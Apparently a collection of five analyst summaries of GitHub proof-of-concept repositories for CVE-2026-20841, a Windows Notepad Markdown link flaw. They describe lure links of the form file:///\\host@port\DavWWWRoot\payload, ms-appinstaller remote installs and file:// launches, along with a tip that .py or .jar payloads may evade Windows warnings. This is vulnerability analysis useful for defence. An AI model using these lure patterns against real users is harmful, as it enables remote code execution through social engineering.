Remote Code Execution in Windows Notepad App via Markdown Link Handling

This repository is a small multi-language proof-of-concept generator for alleged CVE-2026-20841 affecting Microsoft Windows Notepad. It contains three equivalent scripts in JavaScript, Python, and VBScript plus a README. Each script accepts <host> <port> <payload-filename>, validates the port, constructs a UNC/WebDAV-style file URI of the form file:///\\host@port\DavWWWRoot\payload, and writes a Markdown file named poc.md containing a clickable link labeled 'Execute Payload'. The intended attack flow is social-engineering based: the victim opens poc.md in modern Windows Notepad and clicks the embedded link, causing Notepad/Windows to access a remote attacker-controlled WebDAV resource. The code does not implement a WebDAV server, memory corruption, shellcode, or a full RCE chain; it only generates the lure document and relies on external infrastructure and user interaction. Structurally, the repository is straightforward: three standalone entry points with near-identical logic and a README describing the claimed vulnerability, affected products, impact, and defensive guidance. Overall, this is best classified as a PoC/lure generator rather than a weaponized exploit.

Repository contains a minimal, user-assisted PoC for CVE-2026-20841 described as a Windows Notepad (< 11.2510) issue enabling “remote code execution” via a specially crafted Markdown file. There is no exploit code in a traditional sense (no scripts/binaries); the core artifact is `poc.md`, which embeds (1) a GitHub raw HTTPS link to download an external executable (`poc.exe`) and (2) a local Windows path link (`C:\Users\user\Downloads\poc.exe`) intended to run that executable after download. The exploit capability is therefore a social-engineering click-through chain that results in execution of an externally hosted payload, contingent on Notepad’s handling of Markdown links and the user clicking them in sequence. Structure: LICENSE (MIT), README.md (requirements and steps), and poc.md (the crafted Markdown with the two links).

Repository is a small proof-of-concept for CVE-2026-20841, described as a Windows Notepad Markdown renderer issue where URL protocols are not restricted, allowing clickable links to invoke arbitrary protocol handlers. Structure and purpose: - README.md: Explains the vulnerability concept and three user-assisted vectors: (1) file:/// resolving to remote UNC/WebDAV paths to fetch/execute a payload, (2) ms-appinstaller:// to open App Installer with a remote .appx/.msix source, and (3) file:// to launch local executables. - poc.js and poc.py: Two equivalent generators (Node.js and Python) that create a malicious Markdown file named poc.md. They take <host> <port> <payload-path> and embed a link of the form file:///\\<host>@<port>\DavWWWRoot\<payload-path>. - poc.md: Example generated output containing a link to file:///\\192.168.1.100@5005\DavWWWRoot\hello.vbs. - hello.py and hello.vbs: Benign demo payloads (message box) to demonstrate code execution when the link is clicked. Exploit capabilities: - Generates a crafted Markdown document that, when opened in vulnerable Notepad and clicked, causes Windows to resolve and open a remote UNC/WebDAV resource (or other protocol handlers described in the README). This can lead to execution of remote content depending on file association/interpreter availability and Windows security prompts. No scanning, brute force, or automatic exploitation is present; it is a user-assisted PoC generator focused on producing the malicious link and demonstrating payload execution behavior.

Repository contains a minimal proof-of-concept for CVE-2026-20841 affecting the Microsoft Store version of Windows Notepad (builds prior to 11.2510). Structure: - README.md: Describes the claimed vulnerability (Markdown link rendering fails to validate/sanitize URI schemes), impact (RCE), affected versions, and remediation. Includes two PoC link examples. - PoC.md: The actual clickable Markdown payload demonstrating two vectors. Exploit capability: user-assisted code execution by embedding malicious hyperlinks in a Markdown file opened in Notepad. When the victim clicks the link, Notepad passes the URI to Windows protocol handling without proper validation. Demonstrated outcomes include (1) invoking the ms-appinstaller protocol to fetch/install a remote .appx from an attacker-controlled HTTPS URL, and (2) launching a local executable via a file:// URI (cmd.exe shown). No automation, shellcode, or post-exploitation logic is included; it is a conceptual/interaction-based PoC rather than a full weaponized exploit.

Repository is a small proof-of-concept for CVE-2026-20841 (“Windows Notepad RCE”) centered on abusing Notepad’s Markdown link handling to launch a file:/// URL that points to a remote UNC path (WebDAV/SMB). The repo contains two standalone generators (poc.js and poc.py) that take <webdav-server-host> <port> <server/path/to/payload> and write a local markdown file (poc.md) embedding a link of the form file:///\\host@port\DavWWWRoot\payload. The intended attack flow is: attacker hosts a payload on a WebDAV/SMB server; victim opens poc.md in Notepad and clicks the link; Windows fetches/opens the remote file, potentially executing it via file association (e.g., .py if Python is installed). The README documents limitations: many executable/script extensions trigger Windows warnings; using .py or .jar may bypass warnings if the interpreter/runtime is installed. sample-payloads/ provides benign demo payloads (hello.py shows a Windows MessageBox via ctypes; hello.vbs shows a VBScript MsgBox). No scanning, persistence, or C2 is implemented—this is a link-generation PoC rather than a full exploitation framework.